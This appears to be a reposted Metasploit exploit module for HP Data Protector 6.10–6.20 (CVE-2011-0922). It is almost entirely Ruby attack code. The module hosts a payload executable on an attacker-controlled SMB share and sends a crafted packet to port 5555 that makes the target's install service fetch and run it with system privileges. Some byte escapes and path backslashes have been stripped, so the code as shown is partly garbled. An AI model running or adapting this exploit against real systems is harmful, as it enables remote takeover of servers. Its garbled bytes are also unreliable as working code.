HP Data Protector 6.10 / 6.11 / 6.20 Install Service
Posted on 23 April 2016
## # This module requires Metasploit: http://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## require 'msf/core' class MetasploitModule < Msf::Exploit::Remote Rank = ExcellentRanking include Msf::Exploit::Remote::Tcp include Msf::Exploit::Remote::SMB::Server::Share include Msf::Exploit::EXE def initialize(info={}) super(update_info(info, 'Name' => 'HP Data Protector 6.10/6.11/6.20 Install Service', 'Description' => %q{ This module exploits HP Data Protector Omniinet process on Windows only. This exploit invokes the install service function which allows an attacker to create a custom payload in the format of an executable. To ensure this works, the SMB server created in MSF must have a share called Omniback which has a subfolder i386, i.e. \\192.168.1.1\Omniback\i386\ }, 'Author' => [ 'Ben Turner', ], 'References' => [ ['CVE', '2011-0922'], ['URL', 'http://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c02781143'] ], 'DefaultOptions' => { 'EXITFUNC' => 'thread', }, 'Payload' => { 'Space' => 2048, 'DisableNops' => true }, 'Privileged' => true, 'Platform' => 'win', 'Stance' => Msf::Exploit::Stance::Aggressive, 'Targets' => [ [ 'HP Data Protector 6.10/6.11/6.20 / Windows', { } ] ], 'DefaultTarget' => 0, 'DisclosureDate' => 'Nov 02 2011')) register_options( [ Opt::RPORT(5555), OptInt.new('SMB_DELAY', [true, 'Time that the SMB Server will wait for the payload request', 15]) ], self.class) deregister_options('FOLDER_NAME') deregister_options('FILE_CONTENTS') deregister_options('SHARE') deregister_options('FILE_NAME') end def peer "#{rhost}:#{rport}" end def check fingerprint = get_fingerprint if fingerprint.nil? vprint_status('Unable to fingerprint because no response.') return Exploit::CheckCode::Unknown end vprint_status("#{peer} - #{fingerprint}") if fingerprint =~ /HP Data Protector A.06.(d+)/i return Exploit::CheckCode::Appears else return Exploit::CheckCode::Safe end Exploit::CheckCode::Detected end def get_fingerprint ommni = connect ommni.put(rand_text_alpha_upper(64)) resp = ommni.get_once(-1) disconnect return nil if resp.nil? # Delete unicode last null Rex::Text.to_ascii(resp).chop.chomp end def primer self.file_contents = generate_payload_exe self.file_name = "installservice.exe" self.share = "Omniback\i386" print_status("File available on #{unc}...") vprint_status("#{peer} - Trying to execute remote EXE...") lhost = "#{datastore['SRVHOST']}" lhostfull = "" lhost.each_char do |character| lhostfull = lhostfull << "x00" << character end packet = "x00x00x01xbexffxfex32x00x00x00x20" packet << lhostfull packet << "x00x00x00x20x00x30x00" packet << "x00x00x20x00x53x00x59x00x53x00x54x00x45x00x4dx00" packet << "x00x00x20x00x4ex00x54x00x20x00x41x00x55x00x54x00" packet << "x48x00x4fx00x52x00x49x00x54x00x59x00x00x00x20x00" packet << "x43x00x00x00x20x00x32x00x36x00x00x00x20x00x5cx00" packet << "x5c" packet << lhostfull packet << "x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00" packet << "x61x00x63x00x6bx00x5cx00x69x00x33x00x38x00x36x00" packet << "x5cx00x69x00x6ex00x73x00x74x00x61x00x6cx00x6cx00" packet << "x73x00x65x00x72x00x76x00x69x00x63x00x65x00x2ex00" packet << "x65x00x78x00x65x00x20x00x2dx00x73x00x6fx00x75x00" packet << "x72x00x63x00x65x00x20x4fx00x6dx00x6ex00x69x00x62" packet << "x00x61x00x63x00x6bx00x20x00x5cx00x5c" packet << lhostfull packet << "x5cx00x5cx00x4fx00" packet << "x6dx00x6ex00x69x00x62x00x61x00x63x00x6bx00x5cx00" packet << "x69x00x33x00x38x00x36x00x5cx00x69x00x6ex00x73x00" packet << "x74x00x61x00x6cx00x6cx00x73x00x65x00x72x00x76x00" packet << "x69x00x63x00x65x00x2ex00x65x00x78x00x65x00x20x00" packet << "x2dx00x73x00x6fx00x75x00x72x00x63x00x65x00x20x00" packet << "x5cx00x5c" packet << lhostfull packet << "x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00x61x00x63" packet << "x00x6bx00x20x00x00x00x00x00x00x00x02x54" packet << "xffxfex32x00x36x00x00x00x20x00x5bx00x30x00x5dx00" packet << "x41x00x44x00x44x00x2fx00x55x00x50x00x47x00x52x00" packet << "x41x00x44x00x45x00x0ax00x5cx00x5c" packet << lhostfull packet << "x00x5cx00x4fx00x6dx00x6ex00x69x00x62x00x61x00x63" packet << "x00x6bx00x5cx00x69x00x33x00x38x00x36x00" connect sock.put(packet) disconnect end def exploit begin Timeout.timeout(datastore['SMB_DELAY']) {super} rescue Timeout::Error # Stop SMB Server end end end
